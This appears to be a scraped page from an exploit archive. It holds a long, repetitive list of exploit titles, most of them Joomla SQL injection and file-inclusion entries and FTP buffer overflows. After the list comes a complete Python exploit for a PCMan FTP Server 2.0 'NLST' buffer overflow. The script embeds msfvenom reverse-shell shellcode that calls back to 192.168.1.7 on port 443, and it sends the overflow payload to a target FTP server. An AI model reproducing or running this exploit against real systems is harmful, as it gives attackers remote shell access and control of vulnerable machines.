c65daa1397
7 new exploits Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (3) Exim 4.41 - dns_build_reverse Local Exploit Exim 4.41 - 'dns_build_reverse' Local Exploit 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow Exploit 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow BolinTech DreamFTP - (USER) Remote Buffer Overflow (PoC) BolinTech DreamFTP - 'USER' Remote Buffer Overflow (PoC) ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1) Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow Exploit Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow Winamp 5.551 - MAKI Parsing Integer Overflow Exploit Winamp 5.551 - MAKI Parsing Integer Overflow Icarus 2.0 - '.icp' Local Stack Overflow (PoC) Icarus 2.0 - '.ICP' Local Stack Overflow (PoC) ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2) Rock Band CMS 0.10 - news.php Multiple SQL Injection Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (1) Winamp 5.572 - whatsnew.txt Stack Overflow Exploit Winamp 5.572 - whatsnew.txt Stack Overflow Joomla! Component com_wmtpic 1.0 - SQL Injection Joomla! Component 'com_wmtpic' 1.0 - SQL Injection TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (1) Joomla! Component MediQnA 1.1 - Local File Inclusion Joomla! Component 'com_mediqna' 1.1 - Local File Inclusion Joomla! Component My Car - Multiple Vulnerabilities Joomla! Component BF Quiz - SQL Injection (1) Joomla! Component com_jepoll - (pollid) SQL Injection Joomla! Component com_jejob JE Job 1.0 - 'catid' SQL Injection Joomla! Component 'com_mycar' - Multiple Vulnerabilities Joomla! Component 'com_bfquiztrial' - SQL Injection (1) Joomla! Component 'com_jepoll' - 'pollid' Parameter SQL Injection Joomla! Component 'com_jejob' 1.0 - 'catid' Parameter SQL Injection Joomla! Component BF Quiz - SQL Injection (2) Joomla! Component 'com_bfquiztrial' - SQL Injection (2) Joomla! Component com_quran - SQL Injection Joomla! Component 'com_quran' - SQL Injection Joomla! Component com_g2bridge - Local File Inclusion Joomla! Component 'com_g2bridge' - Local File Inclusion Joomla! Component com_jsjobs - SQL Injection Joomla! Component 'com_jsjobs' - SQL Injection Joomla! Component ChronoConnectivity (com_chronoconnectivity) - Blind SQL Injection Joomla! Component ChronoForms (com_chronocontact) - Blind SQL Injection Joomla! Component 'com_chronoconnectivity' - Blind SQL Injection Joomla! Component 'com_chronocontact' - Blind SQL Injection Joomla! Component com_lead - SQL Injection Joomla! Component 'com_lead' - SQL Injection Joomla! Component com_djartgallery - Multiple Vulnerabilities Joomla! Component 'com_djartgallery' - Multiple Vulnerabilities Joomla! Component com_searchlog - SQL Injection Joomla! Component 'com_searchlog' - SQL Injection Joomla! Component com_annonces - Arbitrary File Upload Joomla! Component 'com_annonces' - Arbitrary File Upload Joomla! Component cinema - SQL Injection Joomla! Component 'com_cinema' - SQL Injection Joomla! Component Jreservation 1.5 - SQL Injection / Cross-Site Scripting Joomla! Component 'Jreservation' 1.5 - SQL Injection / Cross-Site Scripting Joomla! Component com_jstore - SQL Injection Joomla! Component com_jtickets - SQL Injection Joomla! Component com_jcommunity - SQL Injection Joomla! Component com_jmarket - SQL Injection Joomla! Component com_jsubscription - SQL Injection Joomla! Component 'com_jstore' - SQL Injection Joomla! Component 'com_jtickets' - SQL Injection Joomla! Component 'com_jcommunity' - SQL Injection Joomla! Component 'com_jmarket' - SQL Injection Joomla! Component 'com_jsubscription' - SQL Injection Joomla! Component com_jnewsletter - SQL Injection Joomla! Component 'com_jnewsletter' - SQL Injection Joomla! Component com_joomdocs - Cross-Site Scripting Joomla! Component Answers 2.3beta - Multiple Vulnerabilities Joomla! Component ozio Gallery 2 - Multiple Vulnerabilities Joomla! Component listbingo 1.3 - Multiple Vulnerabilities Joomla! Component 'com_joomdocs' - Cross-Site Scripting Joomla! Component 'com_answers' 2.3beta - Multiple Vulnerabilities Joomla! Component 'com_oziogallery' 2 - Multiple Vulnerabilities Joomla! Component 'com_listbingo' 1.3 - Multiple Vulnerabilities Joomla! Component RSComments 1.0.0 - Persistent Cross-Site Scripting Joomla! Component 'RSComments' 1.0.0 - Persistent Cross-Site Scripting Joomla! Component com_eportfolio - Arbitrary File Upload Joomla! Component 'com_eportfolio' - Arbitrary File Upload Joomla! Component Template BizWeb com_community - Persistent Cross-Site Scripting Joomla! Component Hot Property com_jomestate - Remote File Inclusion Joomla! Component 'com_community' - Persistent Cross-Site Scripting Joomla! Component 'com_jomestate' - Remote File Inclusion Joomla! Component JomSocial 1.6.288 - Multiple Cross-Site Scripting Joomla! Component 'JomSocial' 1.6.288 - Multiple Cross-Site Scripting Joomla! Component com_ybggal 1.0 - 'catid' SQL Injection Joomla! Component 'com_ybggal' 1.0 - 'catid' Parameter SQL Injection Joomla! Component Picasa2Gallery - Local File Inclusion Joomla! Component 'com_picasa2gallery' - Local File Inclusion Joomla! Component JE Ajax Event Calendar - SQL Injection Joomla! Component 'jeeventcalendar' - SQL Injection Joomla! Component com_realtyna - Local File Inclusion Joomla! Component 'com_realtyna' - Local File Inclusion Joomla! Component JE Story Submit - SQL Injection Joomla! Component com_sef - Remote File Inclusion Joomla! Component 'jesubmit' - SQL Injection Joomla! Component 'com_sef' - Remote File Inclusion Joomla! Component JE Awd Song - Persistent Cross-Site Scripting Joomla! Component JE Media Player - Local File Inclusion Joomla! Component 'com_awd_song' - Persistent Cross-Site Scripting Joomla! Component 'JE Media Player' - Local File Inclusion Joomla! Component JE Event Calendar - Local File Inclusion Joomla! Component JE Job com_jejob - Local File Inclusion Joomla! Component JE Section Finder - Local File Inclusion Joomla! Component 'jeeventcalendar' - Local File Inclusion Joomla! Component 'com_jejob' - Local File Inclusion Joomla! Component 'jesectionfinder' - Local File Inclusion Joomla! Component gamesbox com_gamesbox 1.0.2 - 'id' SQL Injection Joomla! Component Joomanager - SQL Injection Joomla! Component 'com_gamesbox' 1.0.2 - 'id' SQL Injection Joomla! Component 'Joomanager' - SQL Injection Joomla! Component com_dateconverter 0.1 - SQL Injection Joomla! Component 'com_dateconverter' 0.1 - SQL Injection Joomla! Component Front-End Article Manager System - Arbitrary File Upload Joomla! Component 'Front-End Article Manager System' - Arbitrary File Upload Joomla! Component Seyret Video (com_seyret) - Blind SQL Injection Joomla! Component 'com_seyret' - Blind SQL Injection Joomla! Component Seyret (com_seyret) - Local File Inclusion Joomla! Component 'com_seyret' - Local File Inclusion Joomla! Component eventcal 1.6.4 com_eventcal - Blind SQL Injection Joomla! Component 'com_eventcal' 1.6.4 - Blind SQL Injection Joomla! Component SocialAds com_socialads - Persistent Cross-Site Scripting Joomla! Component 'com_socialads' - Persistent Cross-Site Scripting Joomla! Component Phoca Gallery (com_phocagallery) - SQL Injection Joomla! Component Front-edit Address Book (com_addressbook) - Blind SQL Injection Joomla! Component 'com_phocagallery' - SQL Injection Joomla! Component 'com_addressbook' - Blind SQL Injection Joomla! Component NijnaMonials (com_ninjamonials) - Blind SQL Injection Joomla! Component SEF (com_sef) - Local File Inclusion Joomla! Component 'com_ninjamonials' - Blind SQL Injection Joomla! Component 'com_sef' - Local File Inclusion Joomla! Component JPodium (com_jpodium) - SQL Injection Joomla! Component 'com_jpodium' - SQL Injection Joomla! Component com_autartimonial - SQL Injection Joomla! Component 'com_autartimonial' - SQL Injection TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (2) Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit) Joomla! Plugin 'tinybrowser' 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit) Microsoft Excel 2010 - Crash PoC (1) Microsoft Excel 2010 - Crash (PoC) (1) Brooky CubeCart 2.0.1 - SQL Injection Brooky CubeCart 2.0.1/2.0.4 - ndex.php language Parameter Cross-Site Scripting Brooky CubeCart 2.0.1/2.0.4 - 'index.php' language Parameter Cross-Site Scripting Joomla! Component com_easygb - 'Itemid' Parameter Cross-Site Scripting Joomla! Component Percha Downloads Attach 1.1 - 'index.php' Controller Parameter Traversal Arbitrary File Access Joomla! Component Percha Gallery 1.6 Beta - 'index.php' Controller Parameter Traversal Arbitrary File Access Joomla! Component 'com_perchadownloadsattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access Joomla! Component 'com_perchagallery' 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access Joomla! 1.5.x - Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities Joomla! Component com_sar_news - 'id' Parameter SQL Injection Joomla! Component 'com_sar_news' - 'id' Parameter SQL Injection Joomla! Component Jreservation - Cross-Site Scripting Joomla! Component com_videowhisper_2wvc - Cross-Site Scripting Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion Joomla! Component 'com_galleryxml' 1.1 - SQL Injection / Local File Inclusion Joomla! Component Miniwork Studio Canteen 1.0 - SQL Injection / Local File Inclusion Joomla! Component 'com_canteen' 1.0 - Local File Inclusion Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (2) IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Privilege Escalation VLC Media Player 2.2.1 - Buffer Overflow VideoLAN VLC Media Player 2.2.1 - Buffer Overflow Just Dial Clone Script - SQL Injection Just Dial Clone Script - SQL Injection (1) Just Dial Clone Script - SQL Injection Just Dial Clone Script - SQL Injection (2) IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation Freefloat FTP Server 1.0 - 'SITE ZONE' Command Buffer Overflow PCMan FTP Server 2.0.7 - 'NLST' Command Buffer Overflow PCMan FTP Server 2.0.7 - 'SITE CHMOD' Command Buffer Overflow PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow BolinTech DreamFTP 1.02 - 'RETR' Command Remote Buffer Overflow
58 lines
2.2 KiB
Python
Executable file
58 lines
2.2 KiB
Python
Executable file
#!/usr/bin/env python
|
|
# -*- coding: utf-8 -*-
|
|
import socket
|
|
|
|
|
|
#Exploit Title: PCMan FTP Server 2.0 Buffer Overflow NLST command
|
|
#Date: 03/11/16
|
|
#Exploit Author: Karri93
|
|
#Version: 2.0
|
|
#Tested on: Windows XP Profesional SP3 Spanish x86
|
|
#CVE: N/A
|
|
|
|
|
|
#Shellcode Metasploit:
|
|
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.7 LPORT=443 -b '\x00\x0A\x0D' -f -c
|
|
#nc -lvp 443
|
|
|
|
|
|
ret= "\x2F\x1D\xF1\x77" #GDI32.dll
|
|
|
|
shellcode=("\xd9\xc4\xd9\x74\x24\xf4\x5b\x33\xc9\xb1\x52\xba\x9b\x84\x71"
|
|
"\xb0\x83\xc3\x04\x31\x53\x13\x03\xc8\x97\x93\x45\x12\x7f\xd1"
|
|
"\xa6\xea\x80\xb6\x2f\x0f\xb1\xf6\x54\x44\xe2\xc6\x1f\x08\x0f"
|
|
"\xac\x72\xb8\x84\xc0\x5a\xcf\x2d\x6e\xbd\xfe\xae\xc3\xfd\x61"
|
|
"\x2d\x1e\xd2\x41\x0c\xd1\x27\x80\x49\x0c\xc5\xd0\x02\x5a\x78"
|
|
"\xc4\x27\x16\x41\x6f\x7b\xb6\xc1\x8c\xcc\xb9\xe0\x03\x46\xe0"
|
|
"\x22\xa2\x8b\x98\x6a\xbc\xc8\xa5\x25\x37\x3a\x51\xb4\x91\x72"
|
|
"\x9a\x1b\xdc\xba\x69\x65\x19\x7c\x92\x10\x53\x7e\x2f\x23\xa0"
|
|
"\xfc\xeb\xa6\x32\xa6\x78\x10\x9e\x56\xac\xc7\x55\x54\x19\x83"
|
|
"\x31\x79\x9c\x40\x4a\x85\x15\x67\x9c\x0f\x6d\x4c\x38\x4b\x35"
|
|
"\xed\x19\x31\x98\x12\x79\x9a\x45\xb7\xf2\x37\x91\xca\x59\x50"
|
|
"\x56\xe7\x61\xa0\xf0\x70\x12\x92\x5f\x2b\xbc\x9e\x28\xf5\x3b"
|
|
"\xe0\x02\x41\xd3\x1f\xad\xb2\xfa\xdb\xf9\xe2\x94\xca\x81\x68"
|
|
"\x64\xf2\x57\x3e\x34\x5c\x08\xff\xe4\x1c\xf8\x97\xee\x92\x27"
|
|
"\x87\x11\x79\x40\x22\xe8\xea\xaf\x1b\xf3\xed\x47\x5e\xf3\xf0"
|
|
"\x2c\xd7\x15\x98\x42\xbe\x8e\x35\xfa\x9b\x44\xa7\x03\x36\x21"
|
|
"\xe7\x88\xb5\xd6\xa6\x78\xb3\xc4\x5f\x89\x8e\xb6\xf6\x96\x24"
|
|
"\xde\x95\x05\xa3\x1e\xd3\x35\x7c\x49\xb4\x88\x75\x1f\x28\xb2"
|
|
"\x2f\x3d\xb1\x22\x17\x85\x6e\x97\x96\x04\xe2\xa3\xbc\x16\x3a"
|
|
"\x2b\xf9\x42\x92\x7a\x57\x3c\x54\xd5\x19\x96\x0e\x8a\xf3\x7e"
|
|
"\xd6\xe0\xc3\xf8\xd7\x2c\xb2\xe4\x66\x99\x83\x1b\x46\x4d\x04"
|
|
"\x64\xba\xed\xeb\xbf\x7e\x1d\xa6\x9d\xd7\xb6\x6f\x74\x6a\xdb"
|
|
"\x8f\xa3\xa9\xe2\x13\x41\x52\x11\x0b\x20\x57\x5d\x8b\xd9\x25"
|
|
"\xce\x7e\xdd\x9a\xef\xaa")
|
|
|
|
buffer= '\x90'*30 + shellcode
|
|
buffer1= '\x41' * 2007 + ret + buffer + '\x43'*(696-len(buffer))
|
|
print "Sending..."
|
|
|
|
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
connect=s.connect(('192.168.1.43',21))
|
|
s.recv(1024)
|
|
s.send('USER anonymous\r\n')
|
|
s.recv(1024)
|
|
s.send('PASS \r\n')
|
|
s.recv(1024)
|
|
s.send('NLST' + buffer1 + '\r\n')
|
|
s.close()
|